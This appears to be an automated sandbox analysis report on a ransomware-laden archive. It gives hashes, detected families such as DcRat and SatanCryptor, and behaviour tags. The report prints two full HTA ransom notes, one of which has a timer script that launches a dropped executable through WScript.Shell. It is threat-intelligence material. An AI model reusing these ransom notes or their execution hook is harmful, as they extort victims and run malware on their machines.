dcrat

General

Target

Mydooms.zip
Size

7.3MB
Sample

240612-kcy2jawckj
MD5

d9bbe9314e8114fa2cc00422b09fdd9d
SHA1

a138d7a8c054d8dd9904f6fb378d51af02385a52
SHA256

dbcc1bec2dbc4002cfdade40966eb639ccf4da67a7b9728f444beb1d35ed4f7f
SHA512

79c96afd2bedb2ed22027cd135678db411fedeba92e481d2e410eb516cb26d8c8aebf3d63ed8941a91f70dee75a5fa2dfdff8c2bec07c205ac33710f2dff635f
SSDEEP

196608:RyiXnVyuWadlIK+eU3hW0y9PnO+K8Lsi2L:AiXnVyuWaP6eahWPNPt2L

Score

10^/10

Malware Config

Extracted

Family

zebrocy

C2

Windows XP Professional x64 Edition

Extracted

Path

C:\ProgramData\Adobe\# SATAN CRYPTOR #.hta

Ransom Note

<html> <head> <title>SATAN CRYPTOR</title> <HTA:APPLICATION ID="" APPLICATIONNAME="" BORDER="DIALOG" MAXIMIZEBUTTON="NO" SCROLLFLAT="YES" CAPTION="YES" SELECTION="NO" INNERBORDER="NO" ICON="" SCROLL="NO" SHOWINTASKBAR="YES" SINGLEINSTANCE="YES" SYSMENU="YES" WINDOWSTATE="NORMAL" /> </head> <script language=javascript> var winWidth = 800; var winHeight = 600; window.resizeTo(winWidth, winHeight); window.moveTo(screen.width/2-winWidth/2, screen.height/2-winHeight/2); </script> <body bgcolor=buttonface text=buttontext style="font: 10pt 'Tahoma'"> <div style="font-weight:bold; font:16pt; text-align: center" id="Tittle">Attention!</div> <br> <div style="padding:15px" id="SubTittle"> Your documents, photos, databases and other important files have been encrypted cryptographically strong, without the cipher key recovery is impossible! <br> <br> To decrypt your files you need to buy the special software - <strong>SATAN DECRYPTOR</strong> and your <strong>Private Decryption Key</strong>. <br> <br> Using another tools could corrupt your files, in case of using third party software we dont give guarantees that full recovery is possible so use it on your own risk. <br> <br> If you want to restore files, write us to the our e-mail: <strong>[email protected]</strong> <br> <br> Please write your <strong>Personal Identification Code</strong> in body of your message. <br> <br> Also attach to email 3 encrypted files for free decryption test. (each file have to be less than 1 MB size and not have valuable content) <br> <br> It is in your interest to respond as soon as possible to ensure the restoration of your files! <br> <br> Your <strong>Personal Identification Code</strong>: </div> <center> <textarea style="overflow:auto; font:10pt 'Tahoma'" name="TextArea" rows=10 cols=120 readonly>5354000000019B0400000FE0B12B2A0B09B7C71EF78A881641194249A3014C09724727D476421F72BFE3DB1D0FD134D7D01D5736B4AC385B278C4ABAFD08BD4816DB0FC3AC7D9152555AC7F88DA092311E13A978F29BB4532D362E1844F9FFC9DBBEA294F0FDA47B986CF424D745A99E389B0EBA691CD6603683171A144272071A2B3C0BA0D3DB7B89A55502EC94B8540DD4A16DBE4C56E92E0BE742A2328F9D1D4630DC4E650C5426794DEEC7EC17A7C986864B230F868B9F26CA41E3703517FEB18CBA347AD60EB9D3F0A100BA9FBF2C52455DC6A0E2A0C4220752427D349B4E3D7F311C1ACFFA6F9346D1F553742837CF0CD1623AC35AD21049A91A3A39D19A0F10D73DD9D2FE65D891F5FD180DC0A3D7334D63D3789F070BA038A7B664898585E573C0ECCAB275A8412088F4FCD9E89A6C42B93E714445629861FAA5372D0092FD2939A1C76DD8A26E3F19B20522716A5DF5D8BC537747A4D438334B6D414A831C2503C57625177E65B47A0ACB312D551B76D46E8EBB189097437F67E357CC24D7D0310B046BDD3DBDF4A969D5F81CF3D98BFDD59B2E55BC61B9CA06D8BC1254AB1B8EE0F8F9585DE1A69C3646B17BA28A96BB31AFF282EB38A0AE97736539B2CCFF19EA061F89FA56859DBA67F2574639EEC8298F6C6CA9DD21F12E2AE6EB1BCF4AEE123211811D5B141D994571E8C5068F1F21DC1A4C11A830F7377661EB33B82B778592374A524F007B24057DE14E224910F27B8BF065C6E5061DAD95B9406730F06AC7721178C013D5F170A034D26F4F6FD4C77801B212682164A0AF2C851536ACD3530B820646DFB0103A1196305B3AA536445B7C22401CA580F3283A83C501D6D9B874721BDA1CCEF8F2B8D10D44ADCD469B7F5F494291B5BFAEFC607266BAD015D646C16F2C99D1D086A42B53831E49C90B08974630E1E4CDF351A0DBBEFCBACC106660BEB76C3F19B61F6E0F14B6E75EA00B03CD8286C0CA85F3736D0653EEB2BFFAD13D4374647F27ADA6AA4695439D320A489B48D5E280EE3A7E60CAFA21CDE008EF5E40EA0F3A16602C01CB688913260B1DD99E0C2A2286D2EC26AAE883EC76529FCC34AE75F21D58A578C61ACEF70911918CC80DDB52713E723C636468C83F544D524D2DE994436BD3C070A3EF0E6D65E1DDB0AB85558B1800F38E5774FF65BE1D74831AE56A1F0CADB6D1CFA732E831A64A0827FAE648AF2DEFC37E9F832514B0294281991E464992DAF8C3A7AAC64AF88BB30A3AAF9D7C3EFD81D506840998EEC284239C428E4695B1EFF1C7399124904841A9E4E1FE72BEB0FFECAA22A96ACE1B6AADEBE2D31D15B7BC302BBE2F901E1B3C7ACAA4FF14DA9790C1D8305C1DE6FF30CB966011F89E5BC784EA992B7BF52F68F8ABAC6BDF9EAAB4FFA6C47EFA0B2496AE50E52DFC08FD554811C28EBC1349D7FD1C21B185624BAF69F6CFF25B778417B5C6D01427A709867633690D406810BAEDA307C3054193D410AB25CD0ED6C4D0E35EC28F324E6077E0A1970B2E2EE648C9BC864B084A4BA6E4629ADD9C448C3426E8CDAEE2B0716A7C7811476C2FA4E22C92221E20BA4BDB2EC85E007F2600E3288F63D036422799F91C9C5FE0C5BD407C6B0635252CF596EED208D1F10356E358E2FA74667A80B3A43EF7CBDB5235AE5135CA4EF23D88A16C006C7F9F3FAC23297DAD040000</textarea> </center> </body>

Emails

<strong>[email protected]</strong>

Extracted

Path

C:\Users\Admin\Desktop\New folder\Mydoom\Mydoom Ransomwares\info.hta

Ransom Note

<html> <head> <title>Loki locker</title> <HTA:APPLICATION ICON='msiexec.exe' WINDOWSTATE="maximize" SINGLEINSTANCE='yes' SysMenu="no" contextmenu="no" scroll="yes"/> <meta http-equiv="x-ua-compatible" content="IE=9"/> </head> <style type="text/css"> body{background-color: #000000; font-family: Arial, Helvetica, sans-serif;}#t{text-align: center; color: #FF0000; font-weight: bold; font-size: 1.51vw; margin-bottom: 0;}p{text-align: center; font-size: 1vw; color: white; margin-bottom: 0;}.t{text-align: left; margin-left: 2px;}.pt{color: white; font-weight: bold; text-indent: 10px; height: 30px; line-height: 30px; padding-top: 10px; font-size: 1.1vw;}.b{padding: 2px; outline: none;}ul{font-size: 1vw;}.m{background: rgb(189, 54, 54); padding: 1px 5px; font-weight: bold;}#tm{color: red; text-align: center; border-bottom: 0; font-size: 2vw;}</style> <script>var countDownDate = new Date(2024,6,12,8,30,43).getTime(); var x = setInterval(function () { var now = new Date().getTime(); var distance = countDownDate - now; var days = Math.floor(distance / (1000 * 60 * 60 * 24)); var hours = Math.floor((distance % (1000 * 60 * 60 * 24)) / (1000 * 60 * 60)); var minutes = Math.floor((distance % (1000 * 60 * 60)) / (1000 * 60)); var seconds = Math.floor((distance % (1000 * 60)) / 1000); document.getElementById("tm").innerHTML = days + "d," + hours + ":" + minutes + ":" + seconds + " LEFT TO LOSE ALL OF YOUR FILES"; if (distance < 0) { clearInterval(x); document.getElementById("tm").innerHTML = "TIMER IS UP.SAY BYE TO YOUR FILES :)"; WshShell = new ActiveXObject("WScript.Shell"); WshShell.Run("C:\\ProgramData\\winlogon.exe", 1, false);}}, 1000); </script> <body > <h1 id="t">All your files have been encrypted by Loki locker!</h1> <h2 id="tm"></h2> <p>All your files have been encrypted due to a security problem with your PC. <br>If you want to restore them, please send an email <span class="m">[email protected]</span> </p><br><p class="t"> You have to pay for decryption in Bitcoin. The price depends on how fast you contact us. <br>After payment we will send you the decryption tool. <br>You have to 48 hours(2 Days) To contact or paying us After that, you have to Pay <b>Double</b>. <br>In case of no answer in 24 hours (1 Day) write to this email <span class="m">[email protected]</span> <br>Your unique ID is : <span class="m">DE44B1C0</span> </p><br><div class="b" style="background-color: #FF0000;"> <div class="pt">You only have LIMITED time to get back your files!</div><ul style="color: white; margin-top: 0;"> <li>If timer runs out and you dont pay us , all of files will be DELETED and you hard disk will be seriously DAMAGED.</li><li>You will lose some of your data on day 2 in the timer.</li><li>You can buy more time for pay. Just email us.</li><li>THIS IS NOT A JOKE! you can wait for the timer to run out ,and watch deletion of your files :) </li></ul> </div><br><div class="b" style="background-color: rgb(78, 78, 78);"> <div class="pt">What is our decryption guarantee?</div><ul style="color: white; margin-top: 0;"> <li>Before paying you can send us up to <u>3 test files</u> for free decryption. The total size of files must be less than 2Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)</li></div><br><div class="b" style="background-color: #FF0000;"> <div class="pt">Attention!</div><ul style="color: white; margin-top: 0;"> <li><u><b>DO NOT</b> pay any money before decrypting the test files.</u></li><li><u><b>DO NOT</b> trust any intermediary.</u> they wont help you and you may be victim of scam. just email us , we help you in any steps.</li><li><u><b>DO NOT</b> reply to other emails.</u> ONLY this two emails can help you.</li><li>Do not rename encrypted files.</li><li>Do not try to decrypt your data using third party software, it may cause permanent data loss.</li><li>Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.</li></ul> </div></body> </html>

Emails

class="m">[email protected]</span>

URLs

http-equiv="x-ua-compatible"

Targets

- Target
  
  Mydooms.zip
- Size
  
  7.3MB
- MD5
  
  d9bbe9314e8114fa2cc00422b09fdd9d
- SHA1
  
  a138d7a8c054d8dd9904f6fb378d51af02385a52
- SHA256
  
  dbcc1bec2dbc4002cfdade40966eb639ccf4da67a7b9728f444beb1d35ed4f7f
- SHA512
  
  79c96afd2bedb2ed22027cd135678db411fedeba92e481d2e410eb516cb26d8c8aebf3d63ed8941a91f70dee75a5fa2dfdff8c2bec07c205ac33710f2dff635f
- SSDEEP
  
  196608:RyiXnVyuWadlIK+eU3hW0y9PnO+K8Lsi2L:AiXnVyuWaP6eahWPNPt2L
Score

10^/10

dcrat dharma satancryptor zebrocy backdoor bootkit defense_evasion discovery evasion execution impact infostealer persistence ransomware rat spyware stealer trojan upx
- DcRat
  DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
  rat infostealer dcrat
- Dharma
  Dharma is a ransomware that uses security software installation to hide malicious activities.
  ransomware dharma
- Disables service(s)
  evasion execution
- Modifies Windows Defender Real-time Protection settings
  evasion trojan
- SatanCryptor
  Golang ransomware first seen in early 2020.
  ransomware satancryptor
- Zebrocy
  Zebrocy is a backdoor created by Sofacy threat group and has multiple variants developed in different languages.
  trojan backdoor zebrocy
- Zebrocy Go Variant
- DCRat payload
  Detects payload of DCRat, commonly dropped by NSIS installers.
  rat
- Deletes shadow copies
  Ransomware often targets backup files to inhibit system recovery.
  ransomware defense_evasion impact execution
- Renames multiple (262) files with added filename extension
  This suggests ransomware activity of encrypting all the files on the system.
  ransomware
- Disables Task Manager via registry modification
  evasion
- Drops file in Drivers directory
- Modifies Windows Firewall
  evasion
- Sets DLL path for service in the registry
  persistence
- ACProtect 1.3x - 1.4x DLL software
  Detects file using ACProtect software.
- Checks computer location settings
  Looks up country code configured in the registry, likely geofence.
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
- Modifies file permissions
  discovery
- Reads user/profile data of web browsers
  Infostealers often target stored browser data, which can include saved credentials etc.
  spyware stealer
- UPX packed file
  Detects executables packed with UPX/modified UPX open source packer.
  upx
- Adds Run key to start application
  persistence
- Drops desktop.ini file(s)
- Enumerates connected drives
  Attempts to read the root path of hard drives other than the default C: drive.
- Maps connected drives based on registry
  Disk information is often read in order to detect sandboxing environments.
- Modifies WinLogon
  persistence
- Writes to the Master Boot Record (MBR)
  Bootkits write to the MBR to gain persistence at a level below the operating system.
  bootkit persistence
- Drops file in System32 directory
- Sets desktop wallpaper using registry
  ransomware
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
behavioral1